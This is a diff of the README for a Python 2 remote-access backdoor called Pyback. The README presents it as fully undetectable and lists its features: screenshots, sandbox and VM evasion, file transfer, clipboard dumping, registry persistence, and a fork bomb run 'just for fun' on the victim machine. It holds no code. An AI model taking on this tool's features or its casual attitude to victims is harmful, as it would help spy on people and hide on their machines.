johnwax/pyback/README.md

 # Pyback
 FUD python2 backdoor

 # Features
-1- AES encryption available (pycrypto doesnt work as it should with windows so use for linux only)
-2- screenshot
+1- screenshot
-3-check sandbox and VM (VM check only for windows, using wmi module)
+2-check sandbox and VM (VM check only for windows, using wmi module)
-4- download/upload files
+3- download/upload files
-5- dump clipboard
+4- dump clipboard
-6- run a fork bomb on victim machine, just for fun:)
+5- run a fork bomb on victim machine, just for fun:)
-7- persistance using REGKEY (windows only)
+6- persistance using REGKEY (windows only)
-8- client or server connection wait (one time only, no reconnecting yet)
+7- client or server connection wait (one time only, no reconnecting yet)

 # Usage
 `pip install -r requirments.txt`